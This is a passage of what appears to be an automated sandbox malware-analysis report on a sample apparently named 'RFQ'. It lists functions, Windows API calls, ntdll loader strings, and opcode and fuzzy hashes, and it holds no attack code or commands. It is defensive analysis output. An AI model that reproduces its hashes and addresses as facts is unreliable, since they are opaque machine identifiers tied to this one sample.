                                                                                                        • Opcode ID: 06dbeae3592a7089fca0476ce42a4765a8d494291f75a073380a4a8c4fb7d8d4
                                                                                                        • Instruction ID: b919182ea2c7c68a4f837ce068d55c2ee8d3ab15965a1319f684cf118db248dd
                                                                                                        • Opcode Fuzzy Hash: 06dbeae3592a7089fca0476ce42a4765a8d494291f75a073380a4a8c4fb7d8d4
                                                                                                        • Instruction Fuzzy Hash: 6D01B1B2D402187ADB119B919C81DEFBB7CEF40A54B01809AF904BB240D6789F024BA9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0042ADA3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 64 42ada3-42ade7 call 404bd3 call 42bb03 RtlFreeHeap
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042ADE2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_RFQ.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID: k\A
                                                                                                        • API String ID: 3298025750-2887163533
                                                                                                        • Opcode ID: 9356be0a9fe8cbaa9227ba0530063ee393ada402c610cf3d35d4afa146305b9b
                                                                                                        • Instruction ID: 6e7a423ad0c50b43283c3906e191ee9e45f373a4dc453316e29dfb684fa0af0d
                                                                                                        • Opcode Fuzzy Hash: 9356be0a9fe8cbaa9227ba0530063ee393ada402c610cf3d35d4afa146305b9b
                                                                                                        • Instruction Fuzzy Hash: 2AE06DB12042047BC610EE59EC41FEB77ACEFC9710F004419F908A7242DA70B91087B5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0042AD53 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 98 42ad53-42ad94 call 404bd3 call 42bb03 RtlAllocateHeap
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(?,0041D678,?,?,00000000,?,0041D678,?,?,?), ref: 0042AD8F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_RFQ.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 2f83937afba3c77e9cdd549650248ce334a7ce2d5efaac842cf52be4868f9424
                                                                                                        • Instruction ID: 46c047a92bd93528db5555ee1acf7816f76f83662d9afd6a9c2d34aa0dd32a6d
                                                                                                        • Opcode Fuzzy Hash: 2f83937afba3c77e9cdd549650248ce334a7ce2d5efaac842cf52be4868f9424
                                                                                                        • Instruction Fuzzy Hash: 3BE039712046047BCA14EE59DC41FAB37ADEB88710F004419F908A7242DA71B920C7B8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0042ADF3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 103 42adf3-42ae2f call 404bd3 call 42bb03 ExitProcess
                                                                                                        APIs
                                                                                                        • ExitProcess.KERNEL32(?,00000000,?,?,04411C3F,?,?,04411C3F), ref: 0042AE2A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_RFQ.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 621844428-0
                                                                                                        • Opcode ID: 97b74ffc16feab5b33cfeac05f804a63a122753846ab582435be2010940a2906
                                                                                                        • Instruction ID: f4cf3a777cf788f8b72744671999c9502450f263ef52cefaa8d1cfa3781483a1
                                                                                                        • Opcode Fuzzy Hash: 97b74ffc16feab5b33cfeac05f804a63a122753846ab582435be2010940a2906
                                                                                                        • Instruction Fuzzy Hash: AFE046322046147BD220EA6AEC41FDB7BACDFCA714F00845AFA08A7286C775B91587F5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 108 1a72c0a-1a72c0f 109 1a72c11-1a72c18 108->109 110 1a72c1f-1a72c26 LdrInitializeThunk 108->110
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: c42d4cd38b20aaf90cadb5febd0175b8a405279046ed9e676ec1a67da3a4c1cb
                                                                                                        • Instruction ID: 5f5cf9f704e63ea6194c4a65168724701f25d2a7774b63bd55edb280ef1a3a27
                                                                                                        • Opcode Fuzzy Hash: c42d4cd38b20aaf90cadb5febd0175b8a405279046ed9e676ec1a67da3a4c1cb
                                                                                                        • Instruction Fuzzy Hash: C4B09B719015C5C5DA11F7644A08717B90577D0701F56C072D3030645F473CC5D1E275
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Function 01AB2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-2160512332
                                                                                                        • Opcode ID: 885a284a8632be6738a3b12ee9e18377a1ed3ed7e6ed5eb740a56308b2035085
                                                                                                        • Instruction ID: 421398c879e96d0c6672c1803656baf3808c830b055db8e1fc15a9638ecd4d54
                                                                                                        • Opcode Fuzzy Hash: 885a284a8632be6738a3b12ee9e18377a1ed3ed7e6ed5eb740a56308b2035085
                                                                                                        • Instruction Fuzzy Hash: DE926E71604382ABE725DF29C880BABBBECBF84754F04491EFA94D7252D774E844CB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A68620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AA540A, 01AA5496, 01AA5519
                                                                                                        • Invalid debug info address of this critical section, xrefs: 01AA54B6
                                                                                                        • corrupted critical section, xrefs: 01AA54C2
                                                                                                        • Critical section address, xrefs: 01AA5425, 01AA54BC, 01AA5534
                                                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AA54E2
                                                                                                        • double initialized or corrupted critical section, xrefs: 01AA5508
                                                                                                        • 8, xrefs: 01AA52E3
                                                                                                        • undeleted critical section in freed memory, xrefs: 01AA542B
                                                                                                        • Critical section debug info address, xrefs: 01AA541F, 01AA552E
                                                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AA54CE
                                                                                                        • Critical section address., xrefs: 01AA5502
                                                                                                        • Thread identifier, xrefs: 01AA553A
                                                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01AA5543
                                                                                                        • Address of the debug info found in the active list., xrefs: 01AA54AE, 01AA54FA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                        • API String ID: 0-2368682639
                                                                                                        • Opcode ID: 46eff634a3e777457e1ef88ec29d9f43338a48471f60985805eee9e09c24702c
                                                                                                        • Instruction ID: 27cff8934cb517526901f51cf3400e086e72723311cb071eba1f5ab9e6146d8b
                                                                                                        • Opcode Fuzzy Hash: 46eff634a3e777457e1ef88ec29d9f43338a48471f60985805eee9e09c24702c
                                                                                                        • Instruction Fuzzy Hash: AA819AB1E40359BFEB20CF99C840BAEBBB9FB48B14F644119F504B7251D379A944CB64
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A629F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01AA2624
                                                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01AA22E4
                                                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01AA2412
                                                                                                        • @, xrefs: 01AA259B
                                                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01AA24C0
                                                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01AA2506
                                                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01AA25EB
                                                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 01AA261F
                                                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01AA2498
                                                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01AA2409
                                                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01AA2602
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                        • API String ID: 0-4009184096
                                                                                                        • Opcode ID: 2d9a76a8e2bd94d714bb325da0311078b5f0f800fe75738cdc0d132b66089dbd
                                                                                                        • Instruction ID: 7dbef98d00d2a3025ed4486ca4cbbc66d31f5ad14752d00e065541a6e68e4021
                                                                                                        • Opcode Fuzzy Hash: 2d9a76a8e2bd94d714bb325da0311078b5f0f800fe75738cdc0d132b66089dbd
                                                                                                        • Instruction Fuzzy Hash: 40025FB1D002299FDB31DB54CD80BEAB7B8AF54304F4441EAE649A7242EB709F94CF59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AD8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                        • API String ID: 0-2515994595
                                                                                                        • Opcode ID: 3a0d6227c8a1e39de357c676bdbce2bfe260f0e13921c5533768b58b60368f10
                                                                                                        • Instruction ID: 87a95ccc8d47fd776d0bb342f0a80e1ac65fce1df4105779dd4a284b469aed19
                                                                                                        • Opcode Fuzzy Hash: 3a0d6227c8a1e39de357c676bdbce2bfe260f0e13921c5533768b58b60368f10
                                                                                                        • Instruction Fuzzy Hash: D651CF715047019FD32ACF589944BABBBECFF94740F14491DE99AC3280E778E648C792
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AE0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                        • API String ID: 0-1700792311
                                                                                                        • Opcode ID: d8683b7c6a625210e685845c49ea3833d56d8a6d586642d72d098eeb7dece1c1
                                                                                                        • Instruction ID: 0659c37cc6f8e604cacfa22b2b09231b5793d77d75753bb7be068da8daf6b914
                                                                                                        • Opcode Fuzzy Hash: d8683b7c6a625210e685845c49ea3833d56d8a6d586642d72d098eeb7dece1c1
                                                                                                        • Instruction Fuzzy Hash: A2D1EF31600686EFDB22DF68C648AAEBBF1FF5A710F188049F4459B662C7B49945CF20
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AB89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • HandleTraces, xrefs: 01AB8C8F
                                                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01AB8A3D
                                                                                                        • VerifierDlls, xrefs: 01AB8CBD
                                                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01AB8A67
                                                                                                        • VerifierFlags, xrefs: 01AB8C50
                                                                                                        • VerifierDebug, xrefs: 01AB8CA5
                                                                                                        • AVRF: -*- final list of providers -*- , xrefs: 01AB8B8F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                        • API String ID: 0-3223716464
                                                                                                        • Opcode ID: 9e1596b5a74c16a756e0e054c748fe83f1a5e49d8dcb60856fae9e4aebf46380
                                                                                                        • Instruction ID: 8363a73bfa9c997faeb2fd27b0382acef8acac6c295bd25cb0b694a92400619e
                                                                                                        • Opcode Fuzzy Hash: 9e1596b5a74c16a756e0e054c748fe83f1a5e49d8dcb60856fae9e4aebf46380
                                                                                                        • Instruction Fuzzy Hash: C79123B2645792AFD331DF2CC9C0BEB7BACAB95714F450459FA446B282C738AC08C795
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A3EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                        • API String ID: 0-1109411897
                                                                                                        • Opcode ID: bbd06b8780f9dcae6c9e9e963dd8e318e1592e2351193ed891039a29d6d15b28
                                                                                                        • Instruction ID: 4c150498f6dcf875a151b1646276dd55f85788d271c965ece935517b5064a39e
                                                                                                        • Opcode Fuzzy Hash: bbd06b8780f9dcae6c9e9e963dd8e318e1592e2351193ed891039a29d6d15b28
                                                                                                        • Instruction Fuzzy Hash: 61A24974E0562A8FDF64CF19CD887A9BBB5AF89304F1442E9E909A7251DB309EC5CF40
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-792281065
                                                                                                        • Opcode ID: 79f0b1e0b5ac48d3a3c5bb300669a5b5336bfa284a057fecb2fa5729da26a2b6
                                                                                                        • Instruction ID: 0eb16bd6aa819bd81b8d60aef07a43736db95561a9a5269468418e1c0d19ff86
                                                                                                        • Opcode Fuzzy Hash: 79f0b1e0b5ac48d3a3c5bb300669a5b5336bfa284a057fecb2fa5729da26a2b6
                                                                                                        • Instruction Fuzzy Hash: CB917970B00315DBEB35DF28DA48BEA7BB5FF48B24F580129F9086B296D7B49805C790
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A2645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01A89A01
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01A89A11, 01A89A3A
                                                                                                        • LdrpInitShimEngine, xrefs: 01A899F4, 01A89A07, 01A89A30
                                                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01A89A2A
                                                                                                        • apphelp.dll, xrefs: 01A26496
                                                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01A899ED
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-204845295
                                                                                                        • Opcode ID: dc361e729ea26c7c0b0b7250af14db5776d6dfadc1fc63c3a0431132ece83931
                                                                                                        • Instruction ID: efd99b6860f8fc3430442151dac6c0fa53e5d7e5093e56a898b1b8c3b6282880
                                                                                                        • Opcode Fuzzy Hash: dc361e729ea26c7c0b0b7250af14db5776d6dfadc1fc63c3a0431132ece83931
                                                                                                        • Instruction Fuzzy Hash: D151B171248305AFE721EF28D981FABB7E4FBC8648F14091EF98997164D730E905CB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A6C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01A6C6C3
                                                                                                        • LdrpInitializeProcess, xrefs: 01A6C6C4
                                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01AA8170
                                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 01AA81E5
                                                                                                        • LdrpInitializeImportRedirection, xrefs: 01AA8177, 01AA81EB
                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01AA8181, 01AA81F5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                        • API String ID: 0-475462383
                                                                                                        • Opcode ID: db8acf3607bc8abef604e6536c60e1399bd40e57326bffb04b8ae8c78183305e
                                                                                                        • Instruction ID: aaa27dc46674bb361bc4548bce04473e31feada1121bfb93e1602e81d254d4da
                                                                                                        • Opcode Fuzzy Hash: db8acf3607bc8abef604e6536c60e1399bd40e57326bffb04b8ae8c78183305e
                                                                                                        • Instruction Fuzzy Hash: 5531F371644342AFD320EF29DE46E2AB7E4FF94B20F040558F985AB295E734ED04C7A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A62674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01AA21BF
                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 01AA2165
                                                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01AA2160, 01AA219A, 01AA21BA
                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01AA2178
                                                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01AA219F
                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01AA2180
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                        • API String ID: 0-861424205
                                                                                                        • Opcode ID: ba2949af645fcd54b64c5de904fed70afef15738166000c76542b4e2b84d81f8
                                                                                                        • Instruction ID: 40da8c4254e6577991141d7cc4f3fb82ae5e390b88a2defcd0400bda8dbdb9db
                                                                                                        • Opcode Fuzzy Hash: ba2949af645fcd54b64c5de904fed70afef15738166000c76542b4e2b84d81f8
                                                                                                        • Instruction Fuzzy Hash: 8C31E736B403157BE7228B9A8C81F5A7A7DEB94A50F09405AFA04B7145D370AA40C7E1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A7096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 01A72DF0: LdrInitializeThunk.NTDLL ref: 01A72DFA
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A70BA3
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A70BB6
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A70D60
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A70D74
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 1404860816-0
                                                                                                        • Opcode ID: d0aab457fe87894618f8351b372eb1a88e57ec9d14a08d5af0b0413e03d108f1
                                                                                                        • Instruction ID: 3d42c0810ef56370e21eedf1671e2b4295b3a5f06f9449a3a354f0e8d8e85e87
                                                                                                        • Opcode Fuzzy Hash: d0aab457fe87894618f8351b372eb1a88e57ec9d14a08d5af0b0413e03d108f1
                                                                                                        • Instruction Fuzzy Hash: 18427D71900715DFDB61CF28C980BAAB7F4FF09314F1445AAE999DB241E770AA85CF60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A3A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                        • API String ID: 0-379654539
                                                                                                        • Opcode ID: 28114a089deff72493fff00f3ee4f434cd388d0d88f3f49a8f1a4b74cd5cf642
                                                                                                        • Instruction ID: 379a17e0ece7cc5777e5e1a49fba75bc42f4740cfcaf19353d7a211aabb13290
